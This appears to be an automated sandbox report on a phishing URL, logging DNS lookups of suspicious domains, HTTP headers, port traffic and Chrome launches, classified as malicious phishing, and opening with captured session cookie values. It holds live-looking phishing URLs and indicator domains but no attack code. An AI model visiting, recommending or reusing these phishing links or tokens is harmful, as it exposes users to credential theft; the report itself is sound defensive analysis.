XSRF-TOKEN=eyJpdiI6IlBVclJaQVlFbDN1TFJWVVNEMVk0eGc9PSIsInZhbHVlIjoiZStZajJPUkRoMld0SCtsck5VQU12ZUlSQmxjWGtpMW1qNDdzSXZRbDJRYU5mekpVK1BWcnY5amxJcnQrQzErMzZKK2pBR2FiaFI3ekhyOUlISDQxSGM3UlI2a1o1ckxPYks5dG9mTjZoQ3MzQ1p4U3MzZ0ZBTXI2T3JSOEhvZ2ciLCJtYWMiOiI3NDQ4MjRlNWQ5NjY3MGQwMTA1Y2NhYWY0NGQxMGYyODdlYzk4MWI0OTg3NWI2OGJlYjFmMjA3MzViNGE4YzM2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InJhdlh1anpmNWN2eTFaVXJXYjJvVWc9PSIsInZhbHVlIjoiNktDUnJKQWY1emd4YXFWSDdyMlNzNnQ1YytGa2pkZXM4V0ZWd0lrdzZoa3pmWWFRVUZSMlFVeXBjKytIcXR2MHZoY0drK29relBRNFNKWVY4QThZenNhb2FwdXJwMlJxUzlaaFVkUmlCcGNWbC9tcnlOajVydHM4S0JJQkk5ZFkiLCJtYWMiOiJjNmVlNTk0NGEzMTY4OWRlNWQyYWJmMDg4MmQwZGY5M2EzNWU2NmU1OWMxOTExZjQ0NzhiNmZmODE5OWY0ZjgxIiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /c1c6b6c8-d3sb-qm-hhdue0tq8clcu1b-m7tqgv0uyzh6-ekjzwq/logintenantbranding/0/bannerlogo?ts=637292763121529380 HTTP/1.1Host: aadcdn.msauthimages.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /c1c6b6c8-d3sb-qm-hhdue0tq8clcu1b-m7tqgv0uyzh6-ekjzwq/logintenantbranding/0/illustration?ts=637292768768790391 HTTP/1.1Host: aadcdn.msauthimages.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: global traffic	DNS traffic detected: DNS query: www.itanhangasaude.com.br
Source: global traffic	DNS traffic detected: DNS query: vkwek.ckyucle.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: nzd92.6gniu68.ru
Source: global traffic	DNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: code.jquery.com
Source: global traffic	DNS traffic detected: DNS query: challenges.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: 206.23.85.13.in-addr.arpa
Source: global traffic	DNS traffic detected: DNS query: cdn.socket.io
Source: global traffic	DNS traffic detected: DNS query: github.com
Source: global traffic	DNS traffic detected: DNS query: ok4static.oktacdn.com
Source: global traffic	DNS traffic detected: DNS query: objects.githubusercontent.com
Source: global traffic	DNS traffic detected: DNS query: httpbin.org
Source: global traffic	DNS traffic detected: DNS query: ipapi.co
Source: global traffic	DNS traffic detected: DNS query: s3irk.ativens.com
Source: global traffic	DNS traffic detected: DNS query: aadcdn.msauthimages.net

Source: unknown

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 07:40:32 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ntbk1%2B0p%2FKPbnMlpunK%2FF02vxwHxUZE18hSmg6Vb0qrDO1qETED2rd35kRiENcKsGxXLOLDj2AImaw2XunnKdVpn9pEm0zkIHs2vWLzhjlhx9Uq7jOEqVhvsUixkPw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400CF-Cache-Status: HITAge: 1348Server: cloudflareCF-RAY: 89d53a5f9edd8c23-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 07:40:40 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: 2QCk5lnmg/Vz5+Leh/mNbA==$wGqH3Wj9xaw/mcXiawA9wA==Server: cloudflareCF-RAY: 89d53a8feab28c47-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 07:40:44 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: dz1z/F5Y/H+JvFOJLnjQBg==$4H114BBoHY4JTvNfzKIetg==Server: cloudflareCF-RAY: 89d53aab4c9e728a-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 07:41:01 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: bnqcWyO0I0VHDQ3UvW45pA==$c7sV2ixOd2+Gu37NSWq2EQ==Server: cloudflareCF-RAY: 89d53b16392d0f39-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 07:41:03 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y2XypR95Qs7VWdniFUiARnjZ44B9gUvUfBVwLe4MpOYwxw4ib2rjoDCKiWeXOu8bdIEFyOxSpEu4wlwqHJFE6jmg3VyGvkB0%2FYfJuE9w7IHxEVE5Ayhduj9KpAsk5Q%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}alt-svc: h3=":443"; ma=86400Server: cloudflareCF-RAY: 89d53b1cc895428e-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 07:41:08 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uNr7K31YxCybawgO8UcrvC9KOG8x01hj10z4d6VsyJz8tdqSzuEzr2ucdsLTt4o9vVVqnxpyXDz3viB292rO%2Bl2gk1mmsmQNNxMEte%2FgZ9AQMb3D4NGU2dlpMIR%2FQg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}alt-svc: h3=":443"; ma=86400Server: cloudflareCF-RAY: 89d53b3eafe68c36-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 07:41:12 GMTContent-Type: application/json; charset=utf-8Content-Length: 155Connection: closevary: OriginCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p5f604Do%2BEvEulOYwuBd%2FKN3A2hF8%2FZLsNfHkCqbNoMc3fA19tPlYJK%2B2VBDIjh93MJ2nOaHDSVdEhZGeODgv4NZd5UARcFXKsA1NW%2FTuIYY5HFztj6mYBlYH%2FCTmEeHtdMx4g%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 89d53b593c4fc411-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 07:41:13 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9FyY8jlCi%2F4c38DrlGQVn%2B9cY2SnHA0qSQTJPRz%2F6kjxo3cIRyNG7O38Mbgk9DpOFhZ2EbmUVAyLtUU4H%2F83L1dONhtgfRMoHtDx%2B9CLOkABMcKzLgVVyQIFh0r8kA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}alt-svc: h3=":443"; ma=86400Server: cloudflareCF-RAY: 89d53b5f5a3843b8-EWR

Source: chromecache_118.2.dr	String found in binary or memory: http://github.com/fent/randexp.js/raw/master/LICENSE
Source: chromecache_126.2.dr	String found in binary or memory: https://cloud.google.com/contact
Source: chromecache_126.2.dr	String found in binary or memory: https://cloud.google.com/recaptcha-enterprise/billing-information
Source: chromecache_126.2.dr	String found in binary or memory: https://developers.google.com/recaptcha/docs/faq#are-there-any-qps-or-daily-limits-on-my-use-of-reca
Source: chromecache_126.2.dr	String found in binary or memory: https://developers.google.com/recaptcha/docs/faq#localhost_support
Source: chromecache_126.2.dr	String found in binary or memory: https://developers.google.com/recaptcha/docs/faq#my-computer-or-network-may-be-sending-automated-que
Source: chromecache_118.2.dr	String found in binary or memory: https://github.com/fent)
Source: chromecache_126.2.dr	String found in binary or memory: https://play.google.com/log?format=json&hasfast=true
Source: chromecache_126.2.dr	String found in binary or memory: https://recaptcha.net
Source: chromecache_126.2.dr	String found in binary or memory: https://support.google.com/recaptcha
Source: chromecache_126.2.dr	String found in binary or memory: https://support.google.com/recaptcha#6262736
Source: chromecache_126.2.dr	String found in binary or memory: https://support.google.com/recaptcha/#6175971
Source: chromecache_126.2.dr	String found in binary or memory: https://support.google.com/recaptcha/?hl=en#6223828
Source: chromecache_123.2.dr	String found in binary or memory: https://vkwek.ckyucle.com/2DUx/#-
Source: chromecache_126.2.dr	String found in binary or memory: https://www.apache.org/licenses/
Source: chromecache_126.2.dr, chromecache_121.2.dr	String found in binary or memory: https://www.google.com/recaptcha/api2/
Source: chromecache_126.2.dr	String found in binary or memory: https://www.gstatic.c..?/recaptcha/releases/rKbTvxTxwcw5VqzrtN-ICwWt/recaptcha__.
Source: chromecache_121.2.dr	String found in binary or memory: https://www.gstatic.com/recaptcha/releases/rKbTvxTxwcw5VqzrtN-ICwWt/recaptcha__en.js

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 62974 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 62922 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62945 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62951 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62953
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62954
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62955
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62956
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62957
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62958
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62959
Source: unknown	Network traffic detected: HTTP traffic on port 62916 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 62968 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62950
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62951
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62952
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62956 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62911 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62966
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62967
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62968
Source: unknown	Network traffic detected: HTTP traffic on port 62963 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62969
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 62980 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62960
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62961
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62962
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62963
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62957 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62975
Source: unknown	Network traffic detected: HTTP traffic on port 62985 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62962 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62976
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62977
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62978
Source: unknown	Network traffic detected: HTTP traffic on port 62909 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62970
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62971
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62972
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62973
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62974
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 62923 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62987
Source: unknown	Network traffic detected: HTTP traffic on port 62940 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62917 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62934 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62980
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62981
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62982
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62983
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62984
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62985
Source: unknown	Network traffic detected: HTTP traffic on port 62949 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62926 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62917
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62918
Source: unknown	Network traffic detected: HTTP traffic on port 62955 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62978 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62919
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62911
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62912
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62914
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62915
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62916
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62973 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61007 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62921 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62928
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62929
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62920
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62921
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62922
Source: unknown	Network traffic detected: HTTP traffic on port 62984 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62923
Source: unknown	Network traffic detected: HTTP traffic on port 62915 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62924
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62925
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62926
Source: unknown	Network traffic detected: HTTP traffic on port 62932 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62927
Source: unknown	Network traffic detected: HTTP traffic on port 62967 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62972 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62931
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62932
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62933
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62934
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62935
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62936
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62937
Source: unknown	Network traffic detected: HTTP traffic on port 62933 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62938
Source: unknown	Network traffic detected: HTTP traffic on port 62966 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62930
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62927 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 62944 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62950 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62942
Source: unknown	Network traffic detected: HTTP traffic on port 62961 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62943
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62944
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62945
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62946
Source: unknown	Network traffic detected: HTTP traffic on port 62938 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62947
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62949
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62940
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62941
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62983 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62960 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62931 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62919 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62925 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62977 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62936 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62942 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62943 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62920 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62976 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62937 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61007
Source: unknown	Network traffic detected: HTTP traffic on port 62914 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62971 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62954 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62909
Source: unknown	Network traffic detected: HTTP traffic on port 62959 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62982 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62970 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62912 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62958 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62935 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62941 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62987 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62952 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62946 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62929 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62924 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62947 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62953 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62918 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62981 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62975 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62930 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62969 -> 443

Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.43.61.160:443 -> 192.168.2.6:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.43.61.160:443 -> 192.168.2.6:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:62938 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:62978 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:62980 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:62987 version: TLS 1.2

Source: classification engine

Classification label: mal80.phis.win@19/102@36/20

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2124 --field-trial-handle=2020,i,4672451666164520208,10170229004511272603,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.itanhangasaude.com.br/www/1475312998d8aKqdmPdPNJZi4JNq7WIowwvYGOvuIT___714820ufgtMx5cBwKyVuzlJn3VAYy1QdJUF0IuhCb1EFSueBwxxR9n7T4VNMSyrZd9kcF9rD67v2lJn3VufgtMP8xfiVl9n3IuhCbR9n7Tx5cBw4VNMSx5cBwi3vtsVl9n3MryfS1EFSuufgtMi3vts7O1AR408519___47741237d8aKqdmPdPNJZi4JNq7WIowwvYGOvuIT"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2124 --field-trial-handle=2020,i,4672451666164520208,10170229004511272603,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

ID:	1466693
Product:	CloudBasic
Start time:	09:39:36
Start date:	03.07.2024
Cookbook:	browseurl.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS

Overview

General Information

Detection

Signatures

Classification

